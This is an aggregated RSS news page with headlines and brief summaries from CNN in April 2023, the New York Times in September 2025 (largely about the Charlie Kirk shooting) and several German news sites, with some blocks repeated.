“Disgusted and disappointed at the local Portage, MI Office Depot that refused to print a picture of Charlie Kirk, for a prayer vigil tonight. I’m asking every American that sees this to boycott Office Depot."

Article link

Date of publish: Fri, 12 Sep 2025 22:34:58 -0400

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

Judge in Fox News-Dominion defamation trial: 'The parties have resolved their case'

The judge just announced in court that a settlement has been reached in the historic defamation case between Fox News and Dominion Voting Systems.

Article link

Date of publish: Wed, 19 Apr 2023 08:28:17 GMT

'Difficult to say with a straight face': Tapper reacts to Fox News' statement on settlement

A settlement has been reached in Dominion Voting Systems' defamation case against Fox News, the judge for the case announced. The network will pay more than $787 million to Dominion, a lawyer for the company said.

Article link

Date of publish: Tue, 18 Apr 2023 21:17:44 GMT

Millions in the US could face massive consequences unless McCarthy can navigate out of a debt trap he set for Biden

• DeSantis goes to Washington, a place he once despised, looking for support to take on Trump • Opinion: For the GOP to win, it must ditch Trump • Chris Christie mulling 2024 White House bid • Analysis: The fire next time has begun burning in Tennessee

Article link

Date of publish: Tue, 18 Apr 2023 20:34:45 GMT

White homeowner accused of shooting a Black teen who rang his doorbell turns himself in to face criminal charges

• 'A major part of Ralph died': Aunt of teen shot after ringing wrong doorbell speaks • 20-year-old woman shot after friend turned into the wrong driveway in upstate New York, officials say

Article link

Date of publish: Wed, 19 Apr 2023 04:29:05 GMT

Newly released video shows scene of Jeremy Renner's snowplow accident

Newly released body camera footage shows firefighters and sheriff's deputies rushing to help actor Jeremy Renner after a near-fatal snowplow accident in January. The "Avengers" actor broke more than 30 bones and suffered other severe injuries. CNN's Chloe Melas has more.

Article link

Date of publish: Tue, 18 Apr 2023 14:09:43 GMT

Jake Gyllenhaal and Jamie Lee Curtis spent the Covid-19 lockdown together

It's sourdough bread and handstands for Jake Gyllenhaal and Jamie Lee Curtis.

Article link

Date of publish: Tue, 18 Apr 2023 14:40:32 GMT

Toddler crawls through White House fence, prompts Secret Service response

A tiny intruder infiltrated White House grounds Tuesday, prompting a swift response from the US Secret Service.

Article link

Date of publish: Tue, 18 Apr 2023 17:38:16 GMT

Jamie Foxx remains hospitalized nearly a week after 'medical complication'

Jamie Foxx remains hospitalized in Georgia nearly a week after his daughter revealed the actor experienced a "medical complication," a source with knowledge of the matter told CNN on Monday.

Article link

Date of publish: Tue, 18 Apr 2023 00:27:07 GMT

A 13-year-old dies after participating in a Benadryl TikTok 'challenge'

A 13-year-old in Ohio has died after "he took a bunch of Benadryl," trying a dangerous TikTok challenge that's circulating online, according to a CNN affiliate and a GoFundMe account from his family.

Article link

Date of publish: Wed, 19 Apr 2023 15:01:06 GMT

See pizza delivery guy take out suspect fleeing police

Pizza guy delivers more than a pie, taking out a fleeing suspect. CNN's Jeanne Moos shows him putting his best foot forward.

Article link

Date of publish: Tue, 18 Apr 2023 16:40:22 GMT

Netflix is winding down its DVD business after 25 years

Netflix is officially winding down the business that helped make it a household name.

Article link

Date of publish: Tue, 18 Apr 2023 20:10:51 GMT

FTC chair Lina Khan warns AI could 'turbocharge' fraud and scams

Artificial intelligence tools such as ChatGPT could lead to a "turbocharging" of consumer harms including fraud and scams, and the US government has substantial authority to crack down on AI-driven consumer harms under existing law, members of the Federal Trade Commission said Tuesday.

Article link

Date of publish: Tue, 18 Apr 2023 17:59:38 GMT

Eating too much of these foods is driving the rise in type 2 diabetes, study says

Gobbling up too many refined wheat and rice products, along with eating too few whole grains, is fueling the growth of new cases of type 2 diabetes worldwide, according to a new study that models data through 2018.

Article link

Date of publish: Mon, 17 Apr 2023 16:02:46 GMT

ADHD medication abuse in schools is a 'wake-up call'

At some middle and high schools in the United States, 1 in 4 teens report they've abused prescription stimulants for attention deficit hyperactivity disorder during the year prior, a new study found.

Article link

Date of publish: Tue, 25 Apr 2023 17:44:36 GMT

Apple CEO was presented with an original Macintosh. See his reaction

CEO Tim Cook personally welcomed customers to the new Apple store in Mumbai as the tech company opens its first retail stores in India. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:17:25 GMT

Democrats bash Justice Clarence Thomas but their plan to investigate ethics allegations is unclear

Senate Democrats railed against Justice Clarence Thomas on Tuesday amid reports that the Supreme Court conservative failed to disclose luxury travel, gifts and a real estate transaction involving a GOP megadonor, but their plan to investigate the conservative jurist remains unclear.

Article link

Date of publish: Tue, 18 Apr 2023 20:29:46 GMT

Russia is 'going backwards' in equipment and deploying post WWII-era tanks, according to Western officials

• Jailed Wall Street Journal reporter Evan Gershkovich denied detention appeal in Moscow • Putin visits Russian troops at military headquarters in Kherson • Watch moment WSJ journalist appears in Russian court

Article link

Two Russians claiming to be former Wagner commanders admit killing children and civilians in Ukraine

Two Russian men who claim to be former Wagner Group commanders have told a human rights activist that they killed children and civilians during their time in Ukraine.

Article link

Date of publish: Tue, 18 Apr 2023 19:07:52 GMT

'My stomach is hurting from laughing': Hear panelist's reaction to DeSantis' threat to Disney

CNN panelists react to Florida Gov. Ron DeSantis floating the idea of building a competing theme park next to Disney World in Orlando.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:56 GMT

GOP prepared to block vote to replace Feinstein on Senate Judiciary

Senate Majority Leader Chuck Schumer said on Tuesday that he hopes to replace Democratic Sen. Dianne Feinstein on the Senate Judiciary Committee with Sen. Ben Cardin of Maryland and aims to set up a floor vote on the issue this afternoon, which Republicans are expected to block.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:13 GMT

Oklahoma governor calls on officials to resign over recording of racist and threatening remarks

Article link

Date of publish: Tue, 18 Apr 2023 17:33:17 GMT

McCarthy slams Biden in handling of US debt

House Speaker Kevin McCarthy traveled to Wall Street on Monday to deliver a fresh warning that the House GOP majority will refuse to lift a cap on government borrowing unless Biden agrees to spending cuts that would effectively neutralize his domestic agenda.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:01 GMT

US warns Russia not to touch American nuclear technology at Ukrainian nuclear plant

The US has sensitive nuclear technology at a nuclear power plant inside Ukraine and is warning Russia not to touch it, according to a letter the US Department of Energy sent to Russia's state-owned nuclear energy firm Rosatom last month.

Article link

Date of publish: Wed, 19 Apr 2023 08:35:33 GMT

Repeated gunshots fired on live TV as ex-lawmaker shot by assassins

Atiq Ahmed, a former lawmaker in India's parliament, convicted of kidnapping, was shot dead along with his brother while police were escorting them for a medical check-up in a slaying caught on live television on Saturday. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:41:42 GMT

FDA clears the way for additional bivalent boosters for certain vulnerable individuals

The U.S. Food and Drug Administration amended the terms of its emergency use authorizations for the Pfizer and Moderna bivalent vaccines on Tuesday, allowing people ages 65 and older and certain people with weakened immunity to get additional doses before this fall's vaccination campaigns.

Article link

Date of publish: Tue, 18 Apr 2023 15:09:15 GMT

Maine authorities detained a person of interest after 4 people were found dead in a home and 3 others shot while driving

Maine authorities have detained a person of interest and continue to investigate after two shooting incidents that appear to be connected left at least four people dead and three others injured, state police said.

Article link

Date of publish: Wed, 19 Apr 2023 01:49:51 GMT

Southwest says flights resumed after delays caused by 'tech issues'

• Delta Air Lines reports record bookings for summer travel • Air France and Airbus acquitted in trial over 2009 plane crash

Article link

Date of publish: Tue, 18 Apr 2023 17:15:29 GMT

Damar Hamlin cleared to resume football activities after January cardiac arrest

Buffalo Bills safety Damar Hamlin, who has been cleared to resume football activities, said Tuesday his cardiac arrest during an NFL game in January was caused by commotio cordis.

Article link

Date of publish: Tue, 18 Apr 2023 22:11:37 GMT

Pilot makes history after landing on top of a 56-story hotel

Polish pilot Lukasz Czepiela made history after landing a plane on a helipad at the top of a 56-story hotel in Dubai.

Article link

Date of publish: Sun, 19 Mar 2023 11:22:30 GMT

Top US Navy admiral defends non-binary sailor amid some Republican criticism

The top US Navy admiral ardently defended a non-binary sailor on Tuesday amid some criticism from Republican lawmakers, saying he is "particularly proud of this sailor."

Article link

Date of publish: Tue, 18 Apr 2023 19:56:40 GMT

Fulton County DA says fake Trump electors are incriminating one another and wants lawyer disqualified

The Fulton County District Attorney's office said some fake electors for Donald Trump have implicated each other in potential criminal activity and is seeking to disqualify their lawyer, according to a new court filing.

Article link

Date of publish: Wed, 19 Apr 2023 15:31:24 GMT

High speed trains are racing across the world. But not in America

High speed trains have proved their worth across the world over the past 50 years.

Article link

Date of publish: Wed, 19 Apr 2023 02:39:40 GMT

Podcast: One country musician is calling for other artists to oppose assault rifles
Here's what you need to know if you haven't filed your return yet — and even if you have

It's April 18, the official deadline to file your federal and state income tax returns for 2022. (It is also, apparently, National Animal Crackers Day for those who celebrate.)

Article link

Date of publish: Tue, 18 Apr 2023 14:15:43 GMT

Undocumented immigrants are paying their taxes today, too

It's a surprising fact that's often overlooked in the immigration debate.

Article link

Date of publish: Tue, 18 Apr 2023 18:29:24 GMT

Opinion: Why millionaires like us want to pay more in taxes

Tuesday is Tax Day in America, one of the most stressful days of the year, when many taxpayers will finally end their procrastination, file their federal returns, and hope for a refund from the IRS. But for many of the nation's wealthiest, it's just another Tuesday.

Article link

Date of publish: Mon, 17 Apr 2023 19:32:49 GMT

'World's longest' purpose-built cycling tunnel opens in Norway

There are many ways to explore the seven mountains that surround the picturesque UNESCO World Heritage city of Bergen on Norway's fjord-studded west coast. The newest, however, might well be record-breaking.

Article link

Date of publish: Tue, 18 Apr 2023 10:44:27 GMT

Artist rejects photo prize after AI-generated image wins award

A German artist has rejected an award from a prestigious international photography competition after revealing that his submission was generated by Artificial Intelligence (AI).

Article link

Date of publish: Tue, 18 Apr 2023 15:27:54 GMT

These ships disappeared in Lake Superior a century ago. Watch as they're found again

The Great Lakes Shipwreck Historical Society has found two of three ships that sank in the same Lake Superior storm more than a century ago, locating one in 2021 and the other in 2022.

Article link

Date of publish: Tue, 18 Apr 2023 19:29:01 GMT

Erotic images of seniors show sex and intimacy in new light

What does intimacy look like for seniors? There's no end to sex scenes and other steamy content featuring the young and unwrinkled, but past a certain age, popular culture largely draws a blank — or treats sex as a punchline.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:57 GMT

China's economy is off to a solid start, rising 4.5% in Q1 2023

China's economy is off to a solid start in 2023 following its emergence from three years of strict pandemic restrictions.

Article link

Date of publish: Tue, 18 Apr 2023 07:01:12 GMT

Even when wives make as much as husbands, they still do more at home

• Four out of the five US metro areas with the lowest unemployment are in Florida. Here's why • Opinion: The overlooked problem with raising the retirement age for Social Security

Article link

Date of publish: Sun, 16 Apr 2023 17:29:49 GMT

McDonald's is upgrading its burgers

McDonald's, which has been focusing on upgrading its core items to boost sales, is rolling out a series of changes designed to improve its signature burgers.

Article link

Date of publish: Mon, 17 Apr 2023 16:31:30 GMT

Google-parent stock drops on fears it could lose search market share to AI-powered rivals

Shares of Google-parent Alphabet fell more than 3% in early trading Monday after a report sparked concerns that its core search engine could lose market share to AI-powered rivals, including Microsoft's Bing.

Article link

Date of publish: Mon, 17 Apr 2023 15:52:19 GMT

Bidets save you money and reduce waste — we tested the best options out there
50+ products to make your life easier and our planet cleaner
Mother's Day is around the corner. Here are 50+ thoughtful gifts she'll love
A head-to-toe guide of how men should dress this spring, and where they should shop
42 of the most useful travel products you can buy on Amazon
The 7 best high-yield savings accounts of April 2023
Taxes are due tomorrow. Here's how to file for an extension
Composting is an easy way to reduce food waste. Here's how to do it
We stopped using aluminum foil for cooking and you should too. Here's what to use instead
The beloved Dyson Supersonic hair dryer is at its lowest price ever
Everything you need to know about Way Day 2023, Wayfair's biggest sale of the year
The 10 best Amazon deals to shop this week
Mifepristone saved my life

The ruling earlier this month by a Texas federal judge to suspend the US Food and Drug Administration's approval of a drug that is used frequently for medication abortions, is very personal for me.

Article link

Date of publish: Tue, 18 Apr 2023 11:30:00 GMT

The 2024 presidential alternative many voters will want
Why isn't the House Judiciary Committee looking into Thomas?

On Monday, the GOP-controlled House Judiciary Committee — chaired by Donald Trump ally Rep. Jim Jordan — is set to hold a field hearing in New York City called "Victims of Violent Crime in Manhattan." A statement bills the hearing as an examination of how, the Judiciary Committee says, Manhattan District Attorney Alvin Bragg's policies have "led to an increase in violent crime and a dangerous community for New York City residents."

Article link

Date of publish: Mon, 17 Apr 2023 11:37:37 GMT

Top secrets come spilling out

In 1917, British analysts deciphered a coded message the German foreign minister sent to one of his country's diplomats vowing to begin "unrestricted submarine warfare" and seeking to win over Mexico with a promise to "reconquer the lost territory in Texas, New Mexico and Arizona" if the US entered the world war. When it became public, the Zimmerman Telegram caused a sensation, helping propel the US into the conflict against Germany.

Article link

Date of publish: Sun, 16 Apr 2023 11:22:36 GMT

How did Sudan go from casting off despotic rule to this?

Four years ago, almost to the day, the people of Sudan were celebrating a revolution after overthrowing longtime dictator Omar al-Bashir. Now the East African country faces the possibility of a complete collapse similar to the chaos we see today in Yemen or Libya.

Article link

Date of publish: Mon, 17 Apr 2023 22:45:23 GMT

Michelle Yeoh set to return in new 'Star Trek' movie

Live long and prosper, Michelle Yeoh.

Article link

Date of publish: Tue, 18 Apr 2023 19:11:23 GMT

Recap: 'Succession' finds dark humor in the aftershocks

After the shock came the aftershocks, the power vacuum, and perhaps most significantly and impressively, the laughs, as "Succession" pivoted to face life after Logan Roy, in an episode that finally put the HBO show's title into full flower.

Article link

Date of publish: Mon, 17 Apr 2023 02:28:12 GMT

'Yellowjackets' leans hard into '90s music nostalgia, and we're here for it

Of the many dark gifts Showtime's eerie hit series "Yellowjackets" serves up for us, the juiciest this season is by far the music.

Article link

Date of publish: Mon, 01 May 2023 23:02:04 GMT

Jeremy Renner revisits 'the amazing group of people' who helped him recover from his accident

Jeremy Renner is continuing his recovery after his devastating snowplow accident in January, and recognizing those who've helped him along the way.

Article link

Date of publish: Sun, 16 Apr 2023 19:04:10 GMT

Review: 'Barry' takes a whack at its farewell season

"Barry" has taken chances from the very beginning, which is certainly true of a fourth and final season that picks up where the third left off, with its hitman-turned-wannabe actor getting arrested. That paves the way for an even darker season that accentuates the show's ensemble aspect while leaning a little too heavily on blurring lines with flights of fancy.

Article link

Date of publish: Fri, 14 Apr 2023 12:33:08 GMT

NYT > Top Stories

Tyler Robinson, Charlie Kirk Shooting Suspect, Went From Scholarship Winner to Wanted Man

Tyler Robinson, the man accused of shooting Charlie Kirk, was a stellar student in high school, raised in a Republican home in Southwest Utah and training to be an electrician.

Article link

Date of publish: Sat, 13 Sep 2025 03:51:29 +0000

What Made Charlie Kirk Influential?

Ken Bensinger, a New York Times reporter covering media and politics who has interviewed Charlie Kirk several times, recalls his influence on right-wing activism and the American political landscape.

Article link

Date of publish: Fri, 12 Sep 2025 21:20:26 +0000

How Law Enforcement Got the Man Suspected of Killing Charlie Kirk

F.B.I. leaders touted the immense federal deployment assigned to find the assassin. But their big break came with a single tip — from the suspect’s own family.

Article link

Date of publish: Sat, 13 Sep 2025 03:04:53 +0000

Right-Wing Activists Urge Followers to Expose Those Celebrating Charlie Kirk Killing

The widespread and fast-moving campaign has already resulted in lost jobs, suspensions and internal investigations, heightening tensions online between supporters and detractors of Charlie Kirk.

Article link

Date of publish: Fri, 12 Sep 2025 21:44:29 +0000

E.P.A. To Stop Collecting Emissions Data From Polluters

The data, from thousands of coal-burning power plants, oil refineries, steel mills and other industrial facilities, is the country’s most comprehensive way to track greenhouse gases.

Article link

Date of publish: Sat, 13 Sep 2025 03:31:50 +0000

Man Fatally Shot in Confrontation With ICE Officers in Chicago Area

The shooting took place during a federal crackdown on illegal immigration in the region. Officials said an ICE officer was dragged and injured.

Article link

Date of publish: Fri, 12 Sep 2025 22:31:54 +0000

Lawsuit Accuses Trump Officials of More Wrongful Deportations

Plaintiffs accused the Trump administration of using so-called third-country deportations to violate court-ordered protections for migrants, echoing the case of Kilmar Armando Abrego Garcia.

Article link

Date of publish: Sat, 13 Sep 2025 04:51:00 +0000

Natalie Massenet and Erik Torstensson’s Messy Split, in Dueling Lawsuits

In the messy, public split of the Net-a-Porter founder Natalie Massenet and Erik Torstensson, no accusations seem off limits.

Article link

Date of publish: Fri, 12 Sep 2025 20:45:48 +0000

Zinc Roofs Give Paris Its Signature Look. But They Are a Nightmare in Heat.

As climate change helps fuel more severe heat waves, the city is struggling between maintaining its architectural heritage and keeping apartments livable.

Article link

Date of publish: Sat, 13 Sep 2025 04:01:09 +0000

Former Judge Sushila Karki Named Nepal’s Leader After Gen Z Protests

Sushila Karki, a former chief justice, was the choice of the student protesters whose mass rallies led to violent clashes and toppled the government.

Article link

Date of publish: Sat, 13 Sep 2025 02:28:51 +0000

Mamdani, if Elected Mayor, Pledges to Order N.Y.P.D. to Arrest Netanyahu

Zohran Mamdani expanded on his vow to arrest Prime Minister Benjamin Netanyahu, saying it would show that New York “stands up for international law.” Experts said the move would be impractical and likely illegal.

Article link

Date of publish: Fri, 12 Sep 2025 19:10:19 +0000

For the First Time in the Mayor’s Race, Cuomo Campaigns at a Mosque

Andrew M. Cuomo, who has faced criticism for bypassing mosques as he seeks to become mayor, spoke of New York as a beacon of opportunity during an appearance in the Bronx.

Article link

Date of publish: Sat, 13 Sep 2025 00:24:07 +0000

Trump Says It Looks Like Mamdani Is ‘Going to Win’

President Trump said on Friday that he believed Zohran Mamdani, the Democratic nominee for mayor of New York City, would win, likening that outcome to a “rebellion.”

Article link

Date of publish: Fri, 12 Sep 2025 22:54:25 +0000

NATO Steps Up Defenses After Russian Drones Violate Polish Airspace

Increased air patrols, air defense systems and other protections will be mobilized over Eastern Europe.

Article link

Date of publish: Fri, 12 Sep 2025 21:44:08 +0000

Roblox Sued for Wrongful Death After Teenager’s Suicide

At age 7, Ethan Dallas began playing the online game, where he met Nate. Deadly abuse followed, said Ethan’s mother, who blames Roblox.

Article link

Date of publish: Fri, 12 Sep 2025 13:43:07 +0000

In High-Profile Closings, Los Angeles Restaurateurs See Trouble

The city’s turmoil, from wildfires to curfews, has exacted a toll on some of its best-loved restaurants and raised worries about the future.

Article link

Date of publish: Thu, 11 Sep 2025 14:22:54 +0000

As Missouri Redistricts, the Career of Rep. Emanuel Cleaver Teeters

The Missouri Senate passed new borders on Friday that Republicans believe would benefit their party by splitting up the district of Representative Emanuel Cleaver, a Democrat.

Article link

Date of publish: Fri, 12 Sep 2025 20:58:11 +0000

Atlantic Settles Writer’s Suit Over Article It Retracted

The writer, Ruth Shalit Barrett, had accused the magazine of defaming her in a lengthy editor’s note.

Article link

Date of publish: Sat, 13 Sep 2025 00:18:56 +0000

A Plea for President Trump With a Fragile Country on Edge

Even if it sounds unrealistic, Trump can do something important with the entire country frayed and on edge: push for calm and unity.

Article link

Date of publish: Sat, 13 Sep 2025 01:45:49 +0000

‘I Was Wrong About Charlie Kirk’: Six Conservative Students on His Killing

We Don’t Want Echo Chambers

Article link

Date of publish: Fri, 12 Sep 2025 19:54:43 +0000

California’s $23 Billion Plan to Restore Federal Cuts to Scientific Research

Democrats are calling for the creation of a state equivalent of the National Institutes of Health, but first state lawmakers and then voters would need to approve it.

Article link

Date of publish: Sat, 13 Sep 2025 04:41:19 +0000

Tesla Board Chair Defend’s Elon Musk’s Humongous Pay Proposal

Robyn Denholm, normally media shy, is campaigning to get shareholders to back the chief executive’s trillion-dollar compensation package.

Article link

Date of publish: Fri, 12 Sep 2025 21:38:08 +0000

Company That Bought Publishers Clearing House Won’t Pay Past Prize Winners

The announcement by ARB Interactive, which bought the company out of bankruptcy protection for $7.1 million in July, cast doubt on how much more money past winners will receive.

Article link

Date of publish: Sat, 13 Sep 2025 00:31:16 +0000

Ego Nwodim Leaves ‘S.N.L.’ After 7 Seasons

Nwodim, known for characters including Lisa From Temecula, is the fifth cast member to leave the sketch comedy show this summer.

Article link

Date of publish: Fri, 12 Sep 2025 17:11:50 +0000

German News

News sites below.

DER SPIEGEL - Schlagzeilen – Tops

News: Kommunalwahl in NRW, Gaza-Demo in Berlin, Charlie Kirk

Vor den Kommunalwahlen in NRW wird noch mal um jede Stimme gekämpft. In Arizona trauern Ultrarechte um ihren wichtigsten Influencer. Und in Berlin rufen die Falschen zur Demo auf. Das ist die Lage am Samstagmorgen.

Article link

Date of publish: Sat, 13 Sep 2025 06:55:00 +0200

Magdeburg ist Deutschlands Gender-Champion – die guten Nachrichten der Woche

Magdeburg ist die Gleichstellungs-Hochburg Deutschlands. In Australien werden Koalas geimpft. Und ein Roboter könnte Spuren früheren Lebens auf dem Mars gefunden haben. Das sind die guten Nachrichten der Woche.

Article link

Date of publish: Sat, 13 Sep 2025 08:16:00 +0200

Ukraine, Israel, Taiwan: Wie Drohnen die Kriegsführung revolutionieren

Drohnen ändern die Kriegsführung fundamental. Sie werfen Granaten ab, kämpfen gegen Panzer, töten Menschen. Experten sehen die Militärgeschichte an einem Wendepunkt. Der SPIEGEL-Report.

Article link

Date of publish: Fri, 12 Sep 2025 19:54:00 +0200

Nachrichten - WELT

Ermittler rekonstruieren Details des tödlichen Parkplatz-Streits von Niedernhall

Ein zwölf Jahre altes Kind stirbt nach einem Streit auf dem Parkplatz eines Supermarkts in Baden-Württemberg. Was über den Hergang bekannt ist und welche Fragen für die Ermittler noch offen sind.

Article link

Date of publish: Sat, 13 Sep 2025 06:56:18 GMT

Neuer Anlauf zur Wahl der Verfassungsrichter – SPD schickt neue Kandidatin ins Rennen

Der Bundestag unternimmt einen neuen Anlauf zur Wahl von drei Verfassungsrichtern. Am 25. September soll der Bundestag wählen. Zuvor muss der Wahlausschuss die neue SPD-Kandidatin Sigrid Emmenegger billigen. Die Wahl erfordert eine Zwei-Drittel-Mehrheit.

Article link

Date of publish: Sat, 13 Sep 2025 06:55:20 GMT

„Habeck konnte froh sein, dass der BND einen Ausweg aus dem Dilemma aufzeigen konnte“

Als Putin den Gashahn zudrehte, zeigte der BND dem zögerlichen Wirtschaftsminister Habeck Wege aus der Krise. Ohne die Agenten wäre Deutschland kalt geblieben. Ex-Kanzler Scholz lobt den Dienst – Habeck dankt auf seine eigene Weise.

Article link

Date of publish: Sat, 13 Sep 2025 06:38:40 GMT

Nachrichten: DIE ZEIT Newsfeed

Bundestagspräsidentin: Julia Klöckner weist Kritik an ihrer Amtsführung zurück

Grünen-Politiker hatten Julia Klöckner zuletzt gezielte Polarisierung vorgeworfen. Die Bundestagspräsidentin weist das zurück – und empfiehlt der Opposition mehr "Würde".

Article link

Date of publish: Sat, 13 Sep 2025 06:56:42 -0000

Proteste in Nepal: Nepals Präsident löst Parlament auf und setzt Neuwahlen an

Nach den gewaltsamen Protesten in Nepal hat Präsident Ramchandra Paudel das Parlament aufgelöst. Für den 5. März setzte er Neuwahlen in dem von Unruhen geprägten Land an.

Article link

Date of publish: Sat, 13 Sep 2025 06:43:19 -0000

Leichtathletik-WM in Tokio: Platz 46 sollte drin sein

In Tokio kämpfen die besten Leichtathleten um Gold. Nach der Nullnummer vom letzten Mal stehen die Chancen auf deutsche Medaillen gut – selbst da, wo man es nicht wartet.

Article link

Date of publish: Sat, 13 Sep 2025 05:47:18 -0000

netzpolitik.org

Chatkontrolle: Noch hält sich Widerstand

Innenminister Dobrindt und Justizministerin Hubig stehen nebeneinander im Gespräch.
Auf sie beide kommt es wesentlich an, wenn es um die deutsche Position zur Chatkontrolle geht: Innenminister Dobrindt (CSU) und Justizministerin Hubig (SPD). – Alle Rechte vorbehalten IMAGO / Political-Moments
Derzeit ist eine Einigung zur Chatkontrolle auf Ebene der EU-Mitgliedstaaten im Rat noch nicht absehbar. Doch ob etwa die Ablehnung aus Deutschland zum massenhaften Scannen privater Kommunikation weiter hält, ist ungewiss. Das hat auch eine Sitzung des Digitalausschusses im Bundestag gezeigt.

Article link

Date of publish: Fri, 12 Sep 2025 14:23:07 +0000

Gut für alle: Gemeinwohlorientierter Journalismus braucht Rechtssicherheit

Grafitti auf einem Rolladen: Mann mit Brille gibt Frau eine Zeitung.
Gemeinwohlorientierter Journalismus hat bei der Union keinen guten Stand. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Claudio Schwarz
Die Bundesregierung will E-Sport gemeinnützig machen. Das ist richtig. Gemeinwohlorientierter Journalismus hingegen muss weiter mit Unsicherheiten rechnen. Das wird sich mit dieser Union auch kaum ändern – obwohl es gerade jetzt bitter nötig wäre. Ein Kommentar.

Article link

Date of publish: Thu, 11 Sep 2025 16:10:04 +0000

Überwachungssoftware: Mehr als zwei Drittel lehnen Palantir ab

Mensch hält Plakat mit der Aufschrift "Peter Thiel = Big Brother"
Protest gegen Palantir in New York im August. Der Konzern rund um Peter Thiel ist auch in die Deportationen in den USA verwickelt. – Alle Rechte vorbehalten IMAGO / ZUMA Press Wire
Geht es um polizeiliche Big-Data-Software und Datenanalyse, fällt immer wieder der Name Palantir. Wie eine aktuelle Umfrage zeigt, sehen Menschen über Parteigrenzen hinweg die Einführung von Überwachungssoftware des US-Konzerns mehrheitlich kritisch.

Article link

Date of publish: Thu, 11 Sep 2025 14:11:06 +0000

Golem.de

Digitale Zombies: Wie Perry Rhodan vor exzessivem Medienkonsum warnte

Mediensüchtige Außerirdische, sinnlose Spielereien: Was in den sechziger Jahren bei Perry Rhodan Fernsehkritik war, klingt heute wie Kritik an unserem Medienkonsum. Von Marius Pieruschka (Unterhaltung & Hobby, Smartphone)

Article link

Date of publish: Sat, 13 Sep 2025 09:00:01 +0200

Hilfloses Unternehmen: Mittelständler wird Opfer von Manipulation auf Google Maps

Ein Unternehmen erhält ohne Kenntnisnahme auf Google Maps einen anderen Namen. Google kann es wochenlang nicht korrigieren. Bis es dann doch geht. Eine Recherche von Ingo Pakalski (Google Maps, Google)

Article link

Date of publish: Sat, 13 Sep 2025 08:00:02 +0200

Network-Slicing und MCx: Telekom bietet neuen Dienst für Blaulichtorganisationen

Die Telekom und andere Netzbetreiber bieten Blaulichtorganisationen neue Dienste. Die Bundesanstalt für den Digitalfunk braucht zu viel Zeit. (Infrastruktur, Long Term Evolution)

Article link

Date of publish: Fri, 12 Sep 2025 18:48:02 +0200

DER SPIEGEL - Schlagzeilen – Tops

News: Kommunalwahl in NRW, Gaza-Demo in Berlin, Charlie Kirk

Vor den Kommunalwahlen in NRW wird noch mal um jede Stimme gekämpft. In Arizona trauern Ultrarechte um ihren wichtigsten Influencer. Und in Berlin rufen die Falschen zur Demo auf. Das ist die Lage am Samstagmorgen.

Article link

Date of publish: Sat, 13 Sep 2025 06:55:00 +0200

Magdeburg ist Deutschlands Gender-Champion – die guten Nachrichten der Woche

Magdeburg ist die Gleichstellungs-Hochburg Deutschlands. In Australien werden Koalas geimpft. Und ein Roboter könnte Spuren früheren Lebens auf dem Mars gefunden haben. Das sind die guten Nachrichten der Woche.

Article link

Date of publish: Sat, 13 Sep 2025 08:16:00 +0200

Ukraine, Israel, Taiwan: Wie Drohnen die Kriegsführung revolutionieren

Drohnen ändern die Kriegsführung fundamental. Sie werfen Granaten ab, kämpfen gegen Panzer, töten Menschen. Experten sehen die Militärgeschichte an einem Wendepunkt. Der SPIEGEL-Report.

Article link

Date of publish: Fri, 12 Sep 2025 19:54:00 +0200

Fall Christina Block: Der Ex-Agent und seine Kampfsportfreunde

Die mutmaßlichen Entführer der Kinder von Christina Block kamen aus Israel. Die meisten Verdächtigen scheinen sich dort frei zu bewegen. Warum wurden sie noch nicht ausgeliefert?

Article link

Date of publish: Fri, 12 Sep 2025 17:26:00 +0200

US-Seuchenschutzbehörde untersucht widerlegte Theorien zu Impfnebenwirkungen

US-Gesundheitsminister Robert F. Kennedy Jr. ist überzeugt, dass Impfstoffe Autismus verursachen. Die Forschung widerspricht. Dennoch soll es eine neue Studie geben. Auch ob Kinder nach Coronaimpfungen gestorben sind, soll geprüft werden.

Article link

Date of publish: Fri, 12 Sep 2025 20:32:00 +0200

Florida: Monatelang ignorierten Polizisten Mary Gingles Hilferufe, dann war sie tot

Ein Mann droht seiner Frau wiederholt mit dem Tod, die Polizei schaut tatenlos zu. Schließlich sterben drei Menschen, ein Kind wird Zeuge. Interne Ermittlungen decken das Ausmaß der Versäumnisse auf.

Article link

Date of publish: Fri, 12 Sep 2025 23:12:00 +0200

Frankreich: Arzt soll zwölf Patienten getötet haben – eine Rettung ist verdächtig

Ein Anästhesist steht vor Gericht, weil er 30 Menschen vergiftet haben soll. Der Fall einer Patientin macht Experten stutzig. Die Wahl des Mittels, das ihr Leben rettete, wirft Fragen auf.

Article link

Date of publish: Fri, 12 Sep 2025 20:57:00 +0200

Frankreich: Ratingagentur Fitch stuft Kreditwürdigkeit herab

Für Frankreichs neuen Premier Lecornu sind es unerfreuliche Nachrichten: Die Ratingagentur Fitch hat die Kreditwürdigkeit des Landes heruntergestuft. Die Kosten für die Refinanzierung der Staatsschulden dürften so steigen.

Article link

Date of publish: Sat, 13 Sep 2025 00:47:00 +0200

Basketball-EM: Dennis Schröder überragt gegen Finnland und widerlegt Kritiker

Im EM-Halbfinale gegen Finnland überragte Dennis Schröder und greift mit dem Nationalteam nach dem Titel. Wieso er nicht längst als das gesehen wird, was er ist: einer der größten deutschen Sportler der Geschichte.

Article link

Date of publish: Sat, 13 Sep 2025 07:51:00 +0200

Bundesliga: Bayer Leverkusen feiert ersten Saisonsieg gegen Eintracht Frankfurt - trotz zweier Platzverweise

Bayer Leverkusen hat Eintracht Frankfurt besiegt. Nach dem Anschluss für die Gäste und einem Platzverweis für Nationalspieler Robert Andrich musste das Team zittern. Dann flog sogar noch ein Leverkusener vom Platz.

Article link

Date of publish: Fri, 12 Sep 2025 22:38:00 +0200

